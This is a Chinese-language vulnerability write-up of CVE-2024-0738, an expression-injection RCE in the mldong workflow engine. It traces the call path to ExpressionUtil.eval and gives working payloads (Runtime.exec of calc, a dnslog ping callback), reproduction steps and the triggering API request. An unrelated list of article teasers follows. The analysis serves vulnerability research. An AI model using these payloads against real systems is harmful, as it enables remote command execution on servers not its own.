CVE-2024-0738 Mldong ExpressionEngine RCE漏洞分析

news2024/12/26 23:36:01
漏洞描述

A vulnerability, which was classified as critical, has been found in ???? mldong 1.0. This issue affects the function ExpressionEngine of the file com/mldong/modules/wf/engine/model/DecisionModel.java. The manipulation leads to code injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251561 was assigned to this vulnerability.

个人开源mldong 1.0中发现一个严重漏洞。此问题影响文件 com/mldong/modules/wf/engine/model/DecisionModel.java 的 ExpressionEngine 函数。这种操纵会导致代码注入。攻击可能是远程发起的。该漏洞已向公众披露并可能被使用。

相关参考

NVD - CVE-2024-0738icon-default.png?t=N7T8https://nvd.nist.gov/vuln/detail/CVE-2024-0738

https://github.com/biantaibao/mldong_RCE/blob/main/RCE.mdicon-default.png?t=N7T8https://github.com/biantaibao/mldong_RCE/blob/main/RCE.md

mldong开源项目地址

mldong: SpringBoot+Vue3快速开发平台、自研工作流引擎icon-default.png?t=N7T8https://gitee.com/mldong/mldong

漏洞发现点

在mldong项目中DecisionModel类里有一个exec方法,它似乎可以执行表达式

 这个ExpressionUtil.eval引起了我们的兴趣。

本地建立文件,测试这行代码是否存在表达式注入。

 (测试环境最好在本项目中,保持环境包的一致性)


import cn.hutool.extra.expression.ExpressionUtil;

import java.util.HashMap;
import java.util.Map;

public class Test {
    public static void main(String[] args) {
        String expression = "T(java.lang.Runtime).getRuntime().exec('calc')";

        Map<String, Object> context = new HashMap<>();
        context.put("a", 1);
        context.put("b", 2);
        context.put("c", 3);

        Object result = ExpressionUtil.eval(expression, context);
        System.out.println(result);
    }
}

技巧:
        1.通过这个包ExpressionUtil在网上找寻使用示例代码或使用手册,再凭经验修改相关参数为表达式payload以造成命令执行。
        2.表达式的payload可以网上输入关键字收集,比如搜索cn.hutool.extra.expression.ExpressionUtil 表达式注入 历史漏洞什么。
        3.有了足够多的payload就可以做模糊测试了

本机计算机弹出,项目的确存在RCE漏洞

找寻调用接口

发现了漏洞点,如何寻找调用的接口,这里提供了几个技巧(还有什么技巧,请大佬补充)
1,右键找相关函数的usages,逐个分析
2,打上断点,前端点击功能看看那个接口会卡住

我这里右键找exec的usages

public abstract class NodeModel extends BaseModel implements Action {
    private String layout;// 布局属性(x,y,w,h)
    // 输入边集合
    private List<TransitionModel> inputs = new ArrayList<TransitionModel>();
    // 输出边集合
    private List<TransitionModel> outputs = new ArrayList<TransitionModel>();
    private String preInterceptors; // 节点前置拦截器
    private String postInterceptors; // 节点后置拦截器

    /**
     * 由子类自定义执行方法
     * @param execution
     */
    abstract void exec(Execution execution);
    @Override
    public void execute(Execution execution) {
        // 0.设置当前节点模型
        execution.setNodeModel(this);
        // 1. 调用前置拦截器
        execPreInterceptors(execution);
        // 2. 调用子类的exec方法
        exec(execution);
        // 3. 调用后置拦截器
        execPostInterceptors(execution);
    }

再次右键找execute的usages...

后面我就遇到了很多困难,因为java的继承类 接口实现类需要挨个分析 也不排除重名现象。如果想分析到接口层,可得下一番功夫。

这里我们先跳过这一步,来到前端的功能页面寻找相关的线索。....

待漏洞复现完毕后 我们再分析接口的调用!

.....

漏洞复现

进入后台管理在流程设计页面中新增流程设计

右键 设置流程属性  

添加这样的流程

点击条件判断的框

准备payload 打dns

T(java.lang.Runtime).getRuntime().exec('ping xxxx.dnslog.cn')  

保存 部署 准备执行  

 来到流程定义开始执行

 顺便添几个 点击确定

查看dnslog结果

ok rce成功复现

接口调用分析

看看它调用了什么接口

 post数据参考

POST /api/wf/processDefine/startAndExecute HTTP/1.1
Host: 
Connection: close

{"processDefineId":"1749714638596308993","f_startTime":["2024-01-23 ",null],"f_endTime":["2024-01-25 ",null],"f_reasonType":2,"f_day":2.5,"f_title":"test"}

来到后端

@PostMapping("/wf/processDefine/startAndExecute")
@ApiOperation(value = "启动流程实例")
@SaCheckPermission(value = {"wf:processDefine:startAndExecute","wf:processDesign:listByType"}, mode = SaMode.OR)
public CommonResult<?> startAndExecute(@RequestBody Dict args) {
    Long processDefineId = args.getLong(FlowConst.PROCESS_DEFINE_ID_KEY);
    args.remove(FlowConst.PROCESS_DEFINE_ID_KEY);
    processInstanceService.startAndExecute(processDefineId,args);
    return CommonResult.ok();
}

 跟进startAndExecute

public class ProcessInstanceServiceImpl extends ServiceImpl<ProcessInstanceMapper, ProcessInstance> implements ProcessInstanceService {
...
    private final ProcessTaskMapper processTaskMapper;
    private final ProcessCcInstanceMapper processCcInstanceMapper;
    @Override
    @Transactional(rollbackFor = Exception.class)
    public void startAndExecute(Long processDefineId, Dict args) {
        String operator = LoginUserHolder.getUserId().toString();
        FlowEngine flowEngine = SpringUtil.getBean(FlowEngine.class);
        ProcessInstance processInstance = flowEngine.startProcessInstanceById(processDefineId,operator,args);
        List<ProcessTask> processTaskList = flowEngine.processTaskService().getDoingTaskList(processInstance.getId(),new String[]{});
        // 取任务自动执行
        processTaskList.forEach(processTask -> {
            args.put(FlowConst.SUBMIT_TYPE, ProcessSubmitTypeEnum.APPLY.getCode());
            flowEngine.executeProcessTask(processTask.getId(),FlowConst.AUTO_ID,args);
        });
    }
...
}

在方法中,首先获取当前登录用户的操作员 ID:

javaCopy CodeString operator = LoginUserHolder.getUserId().toString();

然后,获取 FlowEngine 实例:

javaCopy CodeFlowEngine flowEngine = SpringUtil.getBean(FlowEngine.class);

接下来,使用 flowEngine 实例的 startProcessInstanceById 方法启动一个流程实例,并传入 processDefineIdoperatorargs 参数:

javaCopy CodeProcessInstance processInstance = flowEngine.startProcessInstanceById(processDefineId, operator, args);

然后,使用 flowEngine 实例的 processTaskService() 方法获取正在进行中的任务列表:

javaCopy CodeList<ProcessTask> processTaskList = flowEngine.processTaskService().getDoingTaskList(processInstance.getId(), new String[]{});

接下来,对任务列表进行遍历,并自动执行每个任务:

javaCopy CodeprocessTaskList.forEach(processTask -> {
    args.put(FlowConst.SUBMIT_TYPE, ProcessSubmitTypeEnum.APPLY.getCode());
    flowEngine.executeProcessTask(processTask.getId(), FlowConst.AUTO_ID, args);
});

跟进 flowEngine.executeProcessTask(processTask.getId(),FlowConst.AUTO_ID,args);

public class FlowEngineImpl implements FlowEngine {
    protected Configuration configuration;
    private ProcessDefineService processDefineService;
    private ProcessInstanceService processInstanceService;
    private ProcessTaskService processTaskService;
...
    @Override
    @Transactional(rollbackFor = Exception.class)
    public List<ProcessTask> executeProcessTask(Long processTaskId, String operator, Dict args) {
        Execution execution = execute(processTaskId,operator,args);
        if(execution == null) return Collections.emptyList();
        ProcessModel processModel = execution.getProcessModel();
        // 7. 根据流程任务名称获取对应的任务节点模型
        NodeModel nodeModel = processModel.getNode(execution.getProcessTask().getTaskName());
        // 8. 调用节点模型执行方法
        nodeModel.execute(execution);
        return execution.getProcessTaskList();
    }
...
}

这段代码首先调用 execute 方法来执行指定的流程任务,并将执行结果保存在一个 Execution 对象中。如果 execute 方法返回的 Execution 对象为 null,则直接返回一个空列表。

接着,代码从 Execution 对象中获取了当前任务所属的流程模型(ProcessModel 对象),并根据当前任务名称获取了对应的节点模型(NodeModel 对象)。最后,代码调用了该节点模型的 execute 方法来完成任务的执行。

需要注意的是,该方法使用了 @Transactional 注解来添加事务支持,保证代码在执行过程中出现异常时可以进行回滚。同时,该方法还使用了 Dict 类型的参数来传递一些额外的参数信息,以便在执行过程中进行相关操作。

 跟进Execution execution = execute(processTaskId,operator,args); 看看对参数的处理

public class FlowEngineImpl implements FlowEngine {
    protected Configuration configuration;
    private ProcessDefineService processDefineService;
    private ProcessInstanceService processInstanceService;
    private ProcessTaskService processTaskService;
...
	/**
     * 生成执行对象
     * @param processTaskId
     * @param operator
     * @param args
     * @return
     */
    private Execution execute(Long processTaskId, String operator, Dict args) {
        // 1.1 根据id查询正在进行中的流程任务
        ProcessTask processTask = processTaskService.getById(processTaskId);
        if(processTask == null || !ProcessTaskStateEnum.DOING.getCode().equals(processTask.getTaskState())) {
            throw new JFlowException(WfErrEnum.NOT_FOUND_DOING_PROCESS_TASK);
        }
        // 1.2 判断是否可以执行任务
        if(!processTaskService.isAllowed(processTask,operator)) {
            // 当前参与者不能执行该流程任务
            throw new JFlowException(WfErrEnum.NOT_ALLOWED_EXECUTE);
        }
        // 2. 根据流程任务查询流程实例
        ProcessInstance processInstance = processInstanceService.getById(processTask.getProcessInstanceId());
        // 3. 根据流程实例查询流程定义
        ProcessDefine processDefine = processDefineService.getById(processInstance.getProcessDefineId());
        // 4. 将流程定义文件转成流程模型
        ProcessModel processModel = ModelParser.parse(processDefine.getContent());
        // 5. 将流程任务状态修改为已完成
        processTaskService.finishProcessTask(processTaskId,operator,args);
        processTask.setTaskState(ProcessTaskStateEnum.FINISHED.getCode());
        // 6. 根据流程定义、实例、任务构建执行参数对象
        Execution execution = new Execution();
        execution.setProcessModel(processModel);
        execution.setProcessInstance(processInstance);
        execution.setProcessInstanceId(processInstance.getId());
        execution.setProcessTask(processTask);
        execution.setProcessTaskId(processTaskId);
        execution.setOperator(operator);
        execution.setEngine(this);
        Dict processInstanceVariable = JSONUtil.toBean(processInstance.getVariable(),Dict.class);
        Dict newArgs = Dict.create();
        newArgs.putAll(processInstanceVariable);
        newArgs.putAll(args);
        execution.setArgs(newArgs);
        // 如果提交参数中存在f_前辍参数,则更新到流程实例变量中
        Dict addArgs = Dict.create();
        args.forEach((key,value)->{
            if(key.startsWith(FlowConst.FORM_DATA_PREFIX)) {
                addArgs.put(key,value);
            }
        });
        if(ObjectUtil.isNotEmpty(addArgs)) {
            processInstanceService.addVariable(processInstance.getId(), addArgs);
        }
        return execution;
    }
...
}

 得到execution对象,返回进入nodeModel.execute(execution);

public abstract class NodeModel extends BaseModel implements Action {
    private String layout;// 布局属性(x,y,w,h)
    // 输入边集合
    private List<TransitionModel> inputs = new ArrayList<TransitionModel>();
    // 输出边集合
    private List<TransitionModel> outputs = new ArrayList<TransitionModel>();
    private String preInterceptors; // 节点前置拦截器
    private String postInterceptors; // 节点后置拦截器
/**
 * 由子类自定义执行方法
 * @param execution
 */
abstract void exec(Execution execution);
@Override
public void execute(Execution execution) {
    // 0.设置当前节点模型
    execution.setNodeModel(this);
    // 1. 调用前置拦截器
    execPreInterceptors(execution);
    // 2. 调用子类的exec方法
    exec(execution);
    // 3. 调用后置拦截器
    execPostInterceptors(execution);
}

进入exec方法,这就来到了触发漏洞点的地方

public class DecisionModel extends NodeModel {
    private String expr; // 决策表达式
    private String handleClass; // 决策处理类
    @Override
    public void exec(Execution execution) {
        // 执行决策节点自定义执行逻辑
        boolean isFound = false;
        String nextNodeName = null;
        if(StrUtil.isNotEmpty(expr)) {
            Object obj = ExpressionUtil.eval(expr, execution.getArgs());//漏洞触发点
            nextNodeName = Convert.toStr(obj,"");
        } else if(StrUtil.isNotEmpty(handleClass)) {
            DecisionHandler decisionHandler = ReflectUtil.newInstance(handleClass);
            nextNodeName = decisionHandler.decide(execution);
        }
        for(TransitionModel transitionModel: getOutputs()){
            if (StrUtil.isNotEmpty(transitionModel.getExpr()) && Convert.toBool(ExpressionUtil.eval(transitionModel.getExpr(), execution.getArgs()), false)) {
                // 决策节点输出边存在表达式,则使用输出边的表达式,true则执行
                isFound = true;
                transitionModel.setEnabled(true);
                transitionModel.execute(execution);
            } else if(transitionModel.getTo().equalsIgnoreCase(nextNodeName)) {
                // 找到对应的下一个节点
                isFound = true;
                transitionModel.setEnabled(true);
                transitionModel.execute(execution);
            }
        }
        if(!isFound) {
            // 找不到下一个可执行路线
            throw new JFlowException(WfErrEnum.NOT_FOUND_NEXT_NODE);
        }
    }
}
总结

本次我们分析了CVE-2024-0738漏洞,运用模糊测试的思想挖掘了ExpressionUtil.eval的表达式注入漏洞,之后找到相关调用接口,构造恶意的参数。从而造成表达式的执行。

本次漏洞研究发的包有点复杂,就不附赠poc。有想法的小伙伴可以尝试一下

至于ExpressionUtil.eval底层调用的机制,等下次分章再分析吧...

欢迎大佬评论区留言,

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1406709.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

spawn_group_template | spawn_group | linked_respawn

spawn_group_template | spawn_group | linked_respawn

字段介绍 spawn_group | spawn_group_template 用来记录与脚本事件或boss战斗有关的 creatures | gameobjects 的刷新数据linked_respawn 用来将 creatures | gameobjects 和 boss 联系起来&#xff0c;这样如果你杀死boss&#xff0c; creatures | gameobjects 在副本重置之前…
阅读更多...
【正点原子STM32】STM32基础知识(F1F4F7H7 STM32系统框架、寻址范围、存储器映射的存储器功能划分、寄存器映射)

【正点原子STM32】STM32基础知识(F1F4F7H7 STM32系统框架、寻址范围、存储器映射的存储器功能划分、寄存器映射)

一、STM32系统框架 1.1、Cortex M内核 & 芯片1.2、F1系统架构1.3、F4系统架构1.4、F7系统架构1.5、H7系统架构 二、STM32的寻址范围&#xff1f; 三、存储器映射 存储器功能划分&#xff08;F1为例&#xff09;STM32F1存储器映射图 四、寄存器映射 寄存器基础知识STM3…
阅读更多...
Unity3d C#实现三维场景中图标根据相机距离动态缩放功能

Unity3d C#实现三维场景中图标根据相机距离动态缩放功能

前言 如题的需求&#xff0c;其实可以通过使用UI替代场景中的图标来实现&#xff0c;不过这样UI的处理稍微麻烦&#xff0c;而且需要在图标上添加粒子特效使用SpriteRender更方便快捷。这里就根据相机离图标的位置来计算图标的缩放大小即可。这样基本保持了图标的大小&#xf…
阅读更多...
CSS 图片遮罩学习小节

CSS 图片遮罩学习小节

概念&#xff1a;-webkit-mask-image是一项用于制作镂空图形和图形遮罩效果的CSS样式属性。 -webkit-mask-image 的值既可以是渐变色也可以是图片地址。 -webkit-mask-image 的起源很早&#xff0c;但兼容性不好&#xff0c;因此用途并不广泛。 效果如下&#xff1a; 底图&…
阅读更多...
构建公共场景消防安全,基于YOLOv8【n/s/m/l/x】全系列参数模型开发构建公共消防场景下火点烟雾检测识别系统

构建公共场景消防安全,基于YOLOv8【n/s/m/l/x】全系列参数模型开发构建公共消防场景下火点烟雾检测识别系统

每年火灾导致的意外事故数不胜数&#xff0c;对于意外火灾等实践如果能够做到及早发现及早制止就能够尽可能地在源头端降低意外事故发生的可能性&#xff0c;如果能够结合社区、楼宇等广泛的摄像头资源&#xff0c;对公共场景画面实时计算&#xff0c;及早检测预警火点烟雾能够…
阅读更多...
学校“数据结构”课程Project—扩展功能(自主设计)

学校“数据结构”课程Project—扩展功能(自主设计)

目录 一、设想功能描述 想法缘起 目标功能 二、问题抽象 三、算法设计和优化 1. 易想的朴素搜索 / dp 搜索想法 动态规划&#xff08;dp&#xff09;想法 2. 思考与优化 四、算法实现 五、结果示例 附&#xff1a;使用的地图API 一、设想功能描述 想法缘起 OSM 导出…
阅读更多...
我每天如何使用 ChatGPT

我每天如何使用 ChatGPT

我们都清楚互联网的运作方式——充斥着各种“爆款观点”&#xff0c;极端分裂的意见&#xff0c;恶搞和无知现象屡见不鲜。 最近&#xff0c;大家对于人工智能&#xff08;AI&#xff09;特别是大语言模型&#xff08;LLMs&#xff09;和生成式 AI&#xff08;GenAI&#xff0…
阅读更多...
jenkins安装配置,使用Docker发布maven项目全过程记录(2)

jenkins安装配置,使用Docker发布maven项目全过程记录(2)

2、使用Docker发布Maven项目过程的配置 首先说明&#xff0c;在这里仅介绍我使用Jenkins的发布过程的配置&#xff0c;不涉及Dockerfile、docker-compose.yml文件的内容。 2.1 创建Item 在这里&#xff0c;输入item名称&#xff0c;我使用的Freestyle project&#xff0c;点击…
阅读更多...
短视频矩阵系统软件/电脑pc企业版/手机端双开发~~源头

短视频矩阵系统软件/电脑pc企业版/手机端双开发~~源头

短视频矩阵系统软件开发的属性主要包含以下几个方面&#xff1a; 开发属性&#xff1a; 1. 功能属性&#xff1a;功能是短视频矩阵系统的核心属性&#xff0c;包括短视频的采集、编辑、发布、推广、互动等功能。此外&#xff0c;系统的个性化定制也是考虑的重要因素&#xff0…
阅读更多...
Pycharm运行提示(运行‘Python测试(00.py内)‘(u)

Pycharm运行提示(运行‘Python测试(00.py内)‘(u)

为什么有时候我在pycharm中运行代码会出现图片中的问题&#xff1f; 我们该如何改过来&#xff1f; 很简单 点击文件-设置 点击Python集成工具&#xff0c;在默认测试运行程序里修改为Unittest即可 再次运行代码就会显示正常的运行 你的pycharm可能是英文 如何英文变中文&…
阅读更多...
6.go 库源码文件

6.go 库源码文件

目录 概述总结例子代码结构代码执行结果 结束 概述 库源码文件是不能被直接运行的源码文件&#xff0c;它仅用于存放程序实体&#xff0c;这些程序实体可以被其他代码使用&#xff08;只要遵从 Go 语言规范的话&#xff09; 那么程序实体是什么呢&#xff1f;在 Go 语言中&…
阅读更多...
jenkins安装配置,使用Docker发布maven项目全过程记录(1)

jenkins安装配置,使用Docker发布maven项目全过程记录(1)

使用的CentOS8 系统&#xff0c;其它Linux系统类似 1、jenkins安装 1.1、配置JAVA环境 使用的服务器环境中&#xff0c;安装了Java1.8与Java17&#xff0c;当前jenkins的最低java版本要求java11。系统默认使用的是java1.8&#xff0c;因此需要切换环境。 alternatives --co…
阅读更多...
shopee最新选品:Shopee平台上的最新选品策略和方法

shopee最新选品:Shopee平台上的最新选品策略和方法

在Shopee平台上进行选品是卖家们必须经历的重要步骤。通过精心选择和定位产品&#xff0c;卖家可以提高产品的市场接受度和销售业绩。然而&#xff0c;要在竞争激烈的电商市场中脱颖而出&#xff0c;并不是一件容易的事情。本文将介绍一些在Shopee平台上进行最新选品时可以采用…
阅读更多...
C#winform上位机开发学习笔记11-串口助手接收数据用波形显示功能添加

C#winform上位机开发学习笔记11-串口助手接收数据用波形显示功能添加

1.功能描述 接收串口数据&#xff0c;并将收到的十六进制数据用坐标系的方式将数据波形展示出来 2.代码部分 步骤1&#xff1a;定义链表&#xff0c;用于数据保存 //数据结构-线性链表private List<byte> DataList new List<byte>(); 步骤2&#xff1a;定义波…
阅读更多...
微信小程序(十二)在线图标与字体的获取与引入

微信小程序(十二)在线图标与字体的获取与引入

注释很详细&#xff0c;直接上代码 上一篇 新增内容&#xff1a; 1.从IconFont获取图标与文字的样式链接 2.将在线图标配置进页面中&#xff08;源码&#xff09; 3.将字体配置进页面文字中&#xff08;源码&#xff09; 4.css样式的多文件导入 获取链接 1.获取图标链接 登入…
阅读更多...
精密空调联网网关网关BA108

精密空调联网网关网关BA108

随着通讯技术和控制技术的发展&#xff0c;为了实现楼宇的高效、智能化管理&#xff0c;集中监控管理已成为楼宇智能管理发展的必然趋势。在此背景下&#xff0c;高性能的楼宇暖通数据传输解决方案——协议转换网关应运而生&#xff0c;广泛应用于楼宇自控和暖通空调系统应用中…
阅读更多...
eNSP学习——配置通过STelnet登陆系统

eNSP学习——配置通过STelnet登陆系统

目录 背景 实验内容 实验目的 实验步骤 实验拓扑 详细配置过程 基础配置 配置SSH server 配置SSH client 配置SFTP server 与client 背景 由于Telnet缺少安全的认证方式&#xff0c;而且传输过程采用的是TCP进行明文传输。单纯的提供Telnet服务容易招致主机IP地址欺骗、路…
阅读更多...
ctfshow-命令执行(web53-web72)

ctfshow-命令执行(web53-web72)

目录 web53 web54 web55 web56 web57 web58 web59 web60 web61 web62 web63 web64 web65 web66 web67 web68 web69 web70 web71 web72 web53 …
阅读更多...
多维时序 | Matlab实现CNN-BiGRU-Mutilhead-Attention卷积双向门控循环单元融合多头注意力机制多变量时间序列预测

多维时序 | Matlab实现CNN-BiGRU-Mutilhead-Attention卷积双向门控循环单元融合多头注意力机制多变量时间序列预测

多维时序 | Matlab实现CNN-BiGRU-Mutilhead-Attention卷积双向门控循环单元融合多头注意力机制多变量时间序列预测 目录 多维时序 | Matlab实现CNN-BiGRU-Mutilhead-Attention卷积双向门控循环单元融合多头注意力机制多变量时间序列预测效果一览基本介绍程序设计参考资料 效果一…
阅读更多...
数据分析的理念、流程、方法、工具(下)

数据分析的理念、流程、方法、工具(下)

四、用户分群 1、用户分群 用户分群是精细化运营的基础要求&#xff0c;也是数据分析的最基础方式。对用户进行分群&#xff0c;能帮助我们了解每个细分群体用户的变化情况&#xff0c;进而了解用户的整体现状及发展趋势。同时&#xff0c;由于运营资源本身有限&#xff0c;不…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023